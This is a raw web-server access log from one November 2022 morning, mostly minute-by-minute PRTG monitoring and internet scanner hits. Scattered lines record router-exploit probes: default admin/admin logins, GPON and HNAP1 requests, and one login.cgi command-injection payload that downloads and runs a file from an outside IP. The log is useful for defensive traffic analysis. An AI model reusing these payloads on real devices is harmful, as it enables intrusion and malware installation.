167.94.138.60 - - [08/Nov/2022:07:14:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [08/Nov/2022:07:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [08/Nov/2022:07:16:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [08/Nov/2022:07:16:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [08/Nov/2022:07:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [08/Nov/2022:07:18:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:20:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.224.88.178 - - [08/Nov/2022:07:20:53 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
92.118.39.78 - - [08/Nov/2022:07:21:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [08/Nov/2022:07:21:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.235.64.132 - - [08/Nov/2022:07:21:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
117.216.20.138 - - [08/Nov/2022:07:22:16 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [08/Nov/2022:07:22:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:24:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:25:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.90.145 - - [08/Nov/2022:07:25:58 +0100] "\xb1\x1f\x07\xb5\x02\x99\xb2\xc6L\xb7Q\xe7VR\xfd\xa8\x80^\x8e\xa1\xa0z\xcc\xa1\x1a\xf6" 501 341 "-" "-"
68.183.90.145 - - [08/Nov/2022:07:25:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
68.183.90.145 - - [08/Nov/2022:07:25:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
68.183.90.145 - - [08/Nov/2022:07:25:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [08/Nov/2022:07:26:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.45 - - [08/Nov/2022:07:27:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.45 - - [08/Nov/2022:07:27:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.45 - - [08/Nov/2022:07:27:49 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.45 - - [08/Nov/2022:07:27:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
183.136.225.32 - - [08/Nov/2022:07:27:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [08/Nov/2022:07:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.45.137.115 - - [08/Nov/2022:07:29:32 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [08/Nov/2022:07:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.61.187.101 - - [08/Nov/2022:07:29:53 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [08/Nov/2022:07:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:34:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:39:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:41:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:43:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:46:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:49:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.101.159.188 - - [08/Nov/2022:07:52:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
46.101.159.188 - - [08/Nov/2022:07:52:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
46.101.159.188 - - [08/Nov/2022:07:52:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [08/Nov/2022:07:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.61.187.101 - - [08/Nov/2022:07:53:58 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [08/Nov/2022:07:54:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:55:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:56:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:57:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:58:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.96.55 - - [08/Nov/2022:07:59:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [08/Nov/2022:07:59:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.96.55 - - [08/Nov/2022:07:59:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [08/Nov/2022:08:00:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:01:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:02:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [08/Nov/2022:08:04:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [08/Nov/2022:08:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:06:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.53 - - [08/Nov/2022:08:07:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [08/Nov/2022:08:07:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:08:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:09:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [08/Nov/2022:08:10:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:10:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:11:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:12:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:16:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.166.90.239 - - [08/Nov/2022:08:18:07 +0100] "[:\x9f\xa2.\x93'\xa8L<\xff\xa8`" 501 331 "-" "-"
188.166.90.239 - - [08/Nov/2022:08:18:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.166.90.239 - - [08/Nov/2022:08:18:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.166.90.239 - - [08/Nov/2022:08:18:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
152.89.196.211 - - [08/Nov/2022:08:18:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:18:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.89.181.147 - - [08/Nov/2022:08:19:39 +0100] "GET /login.cgi?cli=aa%20aa%27;rm -rf /tmp/ff;wget%20http://51.38.17.48/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 404 310 "-" "DEMONS/2.0"
212.91.246.72 - - [08/Nov/2022:08:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:20:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:21:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.159.164.227 - - [08/Nov/2022:08:21:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.164.227 - - [08/Nov/2022:08:21:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
212.91.246.72 - - [08/Nov/2022:08:22:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.131.66.209 - - [08/Nov/2022:08:24:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
209.141.33.65 - - [08/Nov/2022:08:24:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
209.141.33.65 - - [08/Nov/2022:08:24:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
209.141.33.65 - - [08/Nov/2022:08:24:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
209.141.33.65 - - [08/Nov/2022:08:24:28 +0100] "GET /favicon.ico HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:24:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [08/Nov/2022:08:25:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [08/Nov/2022:08:25:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:26:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [08/Nov/2022:08:27:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:27:24 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [08/Nov/2022:08:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [08/Nov/2022:08:27:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:27:55 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [08/Nov/2022:08:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [08/Nov/2022:08:29:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:29:06 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:08:29:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:29:43 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [08/Nov/2022:08:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [08/Nov/2022:08:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:30:47 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [08/Nov/2022:08:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [08/Nov/2022:08:31:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.122.204.30 - - [08/Nov/2022:08:32:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:32:18 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
152.89.196.211 - - [08/Nov/2022:08:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.122.204.30 - - [08/Nov/2022:08:32:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:32:32 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [08/Nov/2022:08:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [08/Nov/2022:08:34:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:34:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [08/Nov/2022:08:35:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:35:01 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
94.102.61.10 - - [08/Nov/2022:08:35:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.122.204.30 - - [08/Nov/2022:08:35:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:35:14 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
94.102.61.10 - - [08/Nov/2022:08:35:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [08/Nov/2022:08:35:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [08/Nov/2022:08:36:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:08:36:42 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [08/Nov/2022:08:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [08/Nov/2022:08:37:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:39:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.227.176.119 - - [08/Nov/2022:08:39:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.176.119 - - [08/Nov/2022:08:39:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.176.119 - - [08/Nov/2022:08:39:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
64.62.197.177 - - [08/Nov/2022:08:40:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33"
64.62.197.186 - - [08/Nov/2022:08:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
94.102.61.10 - - [08/Nov/2022:08:40:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:41:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.10 - - [08/Nov/2022:08:42:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.171 - - [08/Nov/2022:08:43:23 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.126 Safari/537.36"
